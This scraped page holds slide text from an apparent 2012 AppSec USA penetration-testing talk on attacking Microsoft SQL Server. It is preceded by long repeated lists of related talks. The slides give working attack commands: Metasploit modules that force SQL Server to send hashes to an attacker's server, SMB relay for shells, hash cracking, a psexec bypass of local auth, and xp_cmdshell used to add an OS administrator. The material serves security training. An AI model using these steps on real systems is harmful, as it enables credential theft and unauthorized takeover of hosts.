DerbyCon2016 - Hacking SQL Server on Scale with PowerShellDerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration Testing
 
Secure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsSecure360 - Extracting Password from Windows
Secure360 - Extracting Password from Windows
 
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
 

Similar a SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012

TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsScott Sutherland
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new blackChris Gates
 
Architecting cloud
Architecting cloudArchitecting cloud
Architecting cloudTahsin Hasan
 
TrinityCore server install guide
TrinityCore server install guideTrinityCore server install guide
TrinityCore server install guideSeungmin Shin
 
Drupal, Memcache and Solr on Windows
Drupal, Memcache and Solr on WindowsDrupal, Memcache and Solr on Windows
Drupal, Memcache and Solr on WindowsAlessandro Pilotti
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalabilityWim Godden
 
Security features In MySQL 8.0
Security features In MySQL 8.0Security features In MySQL 8.0
Security features In MySQL 8.0Mydbops
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQLScott Sutherland
 
Whitepaper MS SQL Server on Linux
Whitepaper MS SQL Server on LinuxWhitepaper MS SQL Server on Linux
Whitepaper MS SQL Server on LinuxRoger Eisentrager
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalabilityWim Godden
 
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureLow Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureMongoDB
 
MySQL database replication
MySQL database replicationMySQL database replication
MySQL database replicationPoguttuezhiniVP
 
Writing & Sharing Great Modules - Puppet Camp Boston
Writing & Sharing Great Modules - Puppet Camp BostonWriting & Sharing Great Modules - Puppet Camp Boston
Writing & Sharing Great Modules - Puppet Camp BostonPuppet
 
MySQL 101 PHPTek 2017
MySQL 101 PHPTek 2017MySQL 101 PHPTek 2017
MySQL 101 PHPTek 2017Dave Stokes
 
Aeon mike guide transparent ssl filtering (1)
Aeon mike guide transparent ssl filtering (1)Aeon mike guide transparent ssl filtering (1)
Aeon mike guide transparent ssl filtering (1)Conrad Cruz
 
Aeon mike guide transparent ssl filtering
Aeon mike guide transparent ssl filteringAeon mike guide transparent ssl filtering
Aeon mike guide transparent ssl filteringConrad Cruz
 

Similar a SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012 (20)

TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new black
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
Architecting cloud
Architecting cloudArchitecting cloud
Architecting cloud
 
TrinityCore server install guide
TrinityCore server install guideTrinityCore server install guide
TrinityCore server install guide
 
Mysql ppt
Mysql pptMysql ppt
Mysql ppt
 
Mysql all
Mysql allMysql all
Mysql all
 
Mysql all
Mysql allMysql all
Mysql all
 
Drupal, Memcache and Solr on Windows
Drupal, Memcache and Solr on WindowsDrupal, Memcache and Solr on Windows
Drupal, Memcache and Solr on Windows
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalability
 
Security features In MySQL 8.0
Security features In MySQL 8.0Security features In MySQL 8.0
Security features In MySQL 8.0
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL
 
Whitepaper MS SQL Server on Linux
Whitepaper MS SQL Server on LinuxWhitepaper MS SQL Server on Linux
Whitepaper MS SQL Server on Linux
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalability
 
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureLow Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
 
MySQL database replication
MySQL database replicationMySQL database replication
MySQL database replication
 
Writing & Sharing Great Modules - Puppet Camp Boston
Writing & Sharing Great Modules - Puppet Camp BostonWriting & Sharing Great Modules - Puppet Camp Boston
Writing & Sharing Great Modules - Puppet Camp Boston
 
MySQL 101 PHPTek 2017
MySQL 101 PHPTek 2017MySQL 101 PHPTek 2017
MySQL 101 PHPTek 2017
 
Aeon mike guide transparent ssl filtering (1)
Aeon mike guide transparent ssl filtering (1)Aeon mike guide transparent ssl filtering (1)
Aeon mike guide transparent ssl filtering (1)
 
Aeon mike guide transparent ssl filtering
Aeon mike guide transparent ssl filteringAeon mike guide transparent ssl filtering
Aeon mike guide transparent ssl filtering
 

Más de Scott Sutherland

Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)Scott Sutherland
 
How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)Scott Sutherland
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationScott Sutherland
 
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerSecure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerScott Sutherland
 
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL ServerScott Sutherland
 
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerScott Sutherland
 
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShellScott Sutherland
 
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShellScott Sutherland
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015Scott Sutherland
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Scott Sutherland
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Scott Sutherland
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2Scott Sutherland
 
Attack all the layers secure 360
Attack all the layers secure 360Attack all the layers secure 360
Attack all the layers secure 360Scott Sutherland
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseScott Sutherland
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksScott Sutherland
 

Más de Scott Sutherland (16)

Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
 
How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
 
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerSecure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
 
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
 
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL Server
 
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
 
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
 
Attack all the layers secure 360
Attack all the layers secure 360Attack all the layers secure 360
Attack all the layers secure 360
 
Declaration of malWARe
Declaration of malWAReDeclaration of malWARe
Declaration of malWARe
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
 

Último

Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 

Último (20)

Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 

SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012

  • 1. SQL Server Exploitation, Escalation, and Pilfering AppSec USA 2012 Authors: Antti Rantasaari Scott Sutherland
  • 2. Who are we? Antti Rantasaari Scott Sutherland (@_nullbind) What we do… • Security consultants at NetSPI • Pentesters ‒ Network ‒ Web ‒ Thick • Researchers, bloggers, etc • Pinball enthusiasts
  • 3. What are we going to cover? 1. Database entry points 2. Domain user  Database user 3. Database user  OS admin 4. OS admin  Database admin 5. Database admin  OS admin 6. Finding sensitive data 7. Escalation: Service accounts 8. Escalation: Database Link Crawling 9. Conclusions
  • 4. Why target SQL Servers? Pentest Goal = Data Access • It’s deployed everywhere • Very few “exploits”, but it’s commonly misconfigured • Integrated with Windows and Active Directory authentication • Easy and stable to exploit
  • 5. Why develop Metasploit tools? • I suck at programming • Easy to use framework • Huge community support • Easy management of code (GitHub) • Easy distribution of code http://www.metasploit.com/ https://github.com/rapid7/metasploit-framework
  • 7. Entry Points: Summary asef Unauthenticated Options • SQL injections • Weak passwords Authenticated Options (usually) • Other database servers • Unencrypted connection strings: ‒ Files ‒ Registry ‒ Network • ODBC connections • Client tools (priv inheritance)
  • 8. DOMAIN user  DATABASE user Privilege Inheritance
  • 9. Privilege Inheritance: Summary The “Domains Users” group is often provided privileges to login into SQL Servers… Evil users just need to: • Find SQL Servers • Verify Access • Attack!
  • 10. Privilege Inheritance: Find SQL Servers Easy SQL Server Discovery = SQLPing v3.0 http://www.sqlsecurity.com/dotnetnuke/uploads/sqlping3.zip
  • 11. Privilege Inheritance: Find SQL Servers Finding SQL Servers with osql:
  • 12. Privilege Inheritance: Verify Access Test current user’s access to SQL Servers with osql: FOR /F “tokens=*” %i in (‘type sqlservers.txt’) do osql –E –S %i –Q “select ‘I have access to:’+@@servername”
  • 13. Privilege Inheritance: Verify Access Test alternative user’s access to the SQL Servers with the MSSQL_SQL Metasploit module: msfconsole use auxiliary/admin/mssql/mssql_sql set RHOST <IP RANGE> set RPORT <port> set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> Set SQL <query> run http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_sql
  • 16. DATABASE USER  OS ADMIN SMB Capture/Relay
  • 17. SMB Capture/Relay: Summary SQL Server supports functions that can access files via UNC paths using the privileges of the SQL Server service account. High level authentication process:
  • 18. SMB Capture/Relay: Summary Stored procedures with UNC support: ‒ *xp_dirtree ‒ *xp_fileexist ‒ xp_getfiledetails Possible SMB authentication attacks: Service Account Network Communication SMB Capture SMB Relay LocalSystem Computer Account Yes No NetworkService Computer Account Yes No *Local Administrator Local Administrator Yes Yes *Domain User Domain User Yes Yes *Domain Admin Domain Admin Yes Yes http://erpscan.com/press-center/smbrelay-bible-2-smbrelay-by-ms-sql-server/ http://www.netspi.com/blog/2010/07/01/invisible-threats-insecure-service-accounts/
  • 20. SMB Capture: Start Sniffing for Hashes Start Metasploit SMB capture module on your evil server to capture seeded password hashes: msfconsole use auxiliary/server/capture/smb set CAINPWFILE /root/cain_hashes.txt set JOHNPWFILE /root/john_hashes.txt exploit http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
  • 21. SMB Capture: Force MS SQL to Auth Force SQL Server to authenticate with the modules: MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> set RHOSTS <IP RANGE> set RPORT <port> Set SMBPROXY <evil server> run
  • 22. SMB Capture: Obtain Seeded Hashes Obtaining service account hashes from the SQL Server should look something like this: DOMAIN: DEMO USER: serviceaccount LMHASH:5e17a06b538a42ae82273227fd61a5952f85252cc731bb25 NTHASH:763aa16c6882cb1b99d40dfc337b69e7e424d6524a91c03e http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
  • 23. SMB Capture: Crack Hashes 1. Crack first half of recovered LANMAN hash with seeded half LM Rainbow Tables: rcracki_mt -h 5e17a06b538a42ae ./halflmchall 2. Crack the second half with john the ripper to obtain case sensitive NTLM password. perl netntlm.pl --seed GPP4H1 --file /root/john_hashes.txt http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
  • 24. SMB Relay: Diagram Very high level overview: http://en.wikipedia.org/wiki/SMBRelay
  • 25. SMB Relay: Setup SMBProxy for Relay SMB Relay to 3rd Party with the SMB_Relay Metasploit exploit module: msfconsole use exploit/windows/smb/smb_relay set SMBHOST <targetserver> exploit If the service account has the local admin privileges on the remote system, then a shell will be returned by the smb_relay module http://www.metasploit.com/modules/exploit/windows/smb/smb_relay
  • 26. SMB Relay: Force MS SQL to Auth Force SQL Server to authenticate with the modules MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI Msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> set RHOSTS <IP RANGE> set RPORT <port> Set SMBPROXY <evil server> run
  • 27. SMB Relay: Get Meterpreter Shells
  • 28. SMB Capture/Relay: Using PW or Shell If meterpreter then: • Type: shell • Type: osql –E –Q “what ever you want” If password: • Sign in via RDP • Open a cmd console • osql –E –Q “what ever you want”
  • 29. DEMO
  • 30. Do a crazy dance! BALLET = NOT CRAZY DANCING FLY = TOTALLY CRAZY
  • 31. OS ADMIN  DATABASE ADMIN SQL Server Local Authorization Bypass
  • 32. Local Auth Bypass: Summary How can we go from OS admin to DB admin? • SQL Server 2000 to 2008 ‒ LocalSystem = Sysadmin privileges • SQL Server 2012 ‒ Must migrate to SQL Server service process for Sysadmin privileges
  • 33. Local Auth Bypass: Summary Transparent Encryption = Mostly Useless (unless local hard drive encryption is in place and key management is done correctly)
  • 34. Local Auth Bypass: Psexec On SQL Server 2000 to 2008 Execute queries as sysadmin with osql: psexec –s cmd.exe osql –E –S “localhostsqlexpress” –Q “select is_srvrolemember(‘sysadmin’)” Execute queries as sysadmin with SSMS: psexec –i –s ssms http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
  • 35. Local Auth Bypass: Get Shell Obtain Meterpreter shell using the PSEXEC module msfconsole use exploit/windows/smb/psexec set RHOST <targetserver> set SMBDOMAIN . set SMBUSER <user> set SMBPASS <password> exploit http://www.metasploit.com/modules/exploit/windows/smb/psexec
  • 36. Local Auth Bypass: Get Sysadmin Create sysadmin in database using the Metasploit mssql_local_auth_bypass post module: In Meterpeter type “background” to return to msconsole. Then, in the msfconsole type: use post/windows/manage/mssql_local_auth_bypass set session <session> set DB_USERNAME <username> set DB_PASSWORD <password> exploit http://www.metasploit.com/modules/post/windows/manage/mssql_local_auth_bypass
  • 37. SQL Server Auth Bypass: Got Sysadmin asef
  • 38. Do a crazy whale dance! To the left… To the right… Now dive!
  • 39. DATABASE ADMIN  OS ADMIN xp_cmdshell
  • 40. XP_CMDSHELL: Summary XP_CMDSHELL = OS COMMAND EXEC Yes. We know you already know this, but don’t forget…
  • 41. XP_CMDSHELL: Re-Install Re-install xp_cmdshell EXEC master..sp_addextendedproc "xp_cmdshell", "C:Program FilesMicrosoft SQL ServerMSSQLBinnxplog70.dll";
  • 42. XP_CMDSHELL: Re-Enable Re-enable xp_cmdshell sp_configure ‘show advanced options’, 1; reconfigure; go; sp_configure ‘xp_cmdshell’, 1; reconfigure; go;
  • 43. XP_CMDSHELL: Execute Commands Add Local OS Administrator with xp_cmdshell EXEC master..xp_cmdshell ‘net user myadmin MyP@sword1’ EXEC master..xp_cmdshell ‘net localgroup administrators /add myadmin’
  • 45. Finding Data: Summary GOAL = Find sensitive data! • Credit cards • Social security number • Medical records
